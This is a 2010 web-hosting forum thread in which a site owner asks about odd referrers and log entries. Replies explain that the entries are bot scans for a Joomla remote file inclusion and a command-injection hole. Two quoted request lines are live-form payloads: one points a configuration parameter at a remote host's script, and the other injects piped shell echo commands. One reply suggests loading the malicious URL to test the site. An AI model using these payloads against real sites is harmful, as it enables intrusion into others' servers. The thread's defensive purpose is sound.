NamePros
Welcome, Guest! Ready to make a name for yourself in the domain business? We welcome both the hobbyist and professional domainer to join the discussion as part of the NamePros community.

Click here to create your profile to start earning reputation for posting, and trader ratings for buying & selling in our free e-marketplace. Build your trader rating with each successful sale. Our system has tracked over 100,000 sales and counting!
FAQ & TOS Register Search Today's Posts Mark Forums Read

Go Back   NamePros.com > Website Development Discussion Forums > Website Development
Reload this Page Strange Referrers & Website/DB Hack Attempts

Website Development Development concepts, scripts, sponsors and affiliate programs.

Advanced Search


Reply
 
LinkBack Thread Tools
Old 09-10-2010, 04:19 PM THREAD STARTER               #1 (permalink)
NamePros Regular
 
freeflow's Avatar
Join Date: Dec 2006
Posts: 236
freeflow is on a distinguished road
 



Strange Referrers & Website/DB Hack Attempts


I have noticed many strange entries in my log files lately. Maybe you can explain some of them to me?

-There have been many referrers from adult and non adult sites that have no relation to any websites I have.
Many of them are Russian. What does this mean?

-Are the following entries attempts to hack my website or DB.

my.website//index.php?option=com_directory&Itemid=&mosConfig_a bsolute_path=http://beltps.by/images/File/zayavlenie/CKrid1.txt??
????: NamePros.com http://www.namepros.com/website-development/676630-strange-referrers-website-db-hack-attempts.html

my.website//index.php?option=com_directory&Itemid=&mosConfig_a bsolute_path=%7Cecho%20%22casper%22;echo%20%22kae% 22;%7C

If these are hack attempts how do I know if they were successful or not?
freeflow is offline   Reply With Quote
Old 09-11-2010, 04:02 AM   #2 (permalink)
NamePros Regular
 
LikuiD's Avatar
Join Date: Jul 2006
Posts: 283
LikuiD will become famous soon enoughLikuiD will become famous soon enough
 




The hacker was trying to launch a file containing php code that would insert his email onto your page
I guess if that had worked with him, he would have tried and launched another file containing a script that would take over your site (creates a backdoor).

The best thing you could do, is follow the first link:
????: NamePros.com http://www.namepros.com/showthread.php?t=676630
my.website//index.php?option=com_directory&Itemid=&mosConfig_a bsolute_path=http://beltps.by/images/File/zayavlenie/CKrid1.txt??
It won't hurt your site, it only contains php echo commands. If you find the hackers email being displayed infront of you, then you have a serious security problem with your site, and should get somebody to fix it right away

Good Luck
LikuiD is offline   Reply With Quote
Old 09-11-2010, 04:44 AM THREAD STARTER               #3 (permalink)
NamePros Regular
 
freeflow's Avatar
Join Date: Dec 2006
Posts: 236
freeflow is on a distinguished road
 



Thanks for the explanation. I tried the first link and it directed to my index page with no changes.
freeflow is offline   Reply With Quote
Old 09-15-2010, 12:11 AM   #4 (permalink)
NamePros Expert
 
labrocca's Avatar
Join Date: Aug 2004
Location: Las Vegas
Posts: 6,277
labrocca Has achieved greatnesslabrocca Has achieved greatnesslabrocca Has achieved greatnesslabrocca Has achieved greatnesslabrocca Has achieved greatnesslabrocca Has achieved greatnesslabrocca Has achieved greatnesslabrocca Has achieved greatnesslabrocca Has achieved greatnesslabrocca Has achieved greatnesslabrocca Has achieved greatness
 



Child Abuse Child Abuse
First is a remote file inclusion attempt.

Second is a common script exploit probably Joomla.
????: NamePros.com http://www.namepros.com/showthread.php?t=676630

These are common scans that are done by bots looking for sites to exploit.

Quote:
If these are hack attempts how do I know if they were successful or not?
Is your site still up? Any javascript injected into your source? Check also your admin accounts and make sure no additional admins exist.

Security for your site is something you always need to practice and have a backup.
__________________
:$: Support Forum <-- My latest endeavor.:loveyou:
Debate Forums Free Online Sudoku My vBum Blog
labrocca is offline   Reply With Quote
Reply


Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
Thread Tools


Liquid Web Smart Servers  
All times are GMT -7. The time now is 01:15 PM.

Managed Web Hosting by Liquid Web
Domain name forum recommended by Domaining.com Powered by: vBulletin® Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.6.0 Ad Management plugin by RedTyger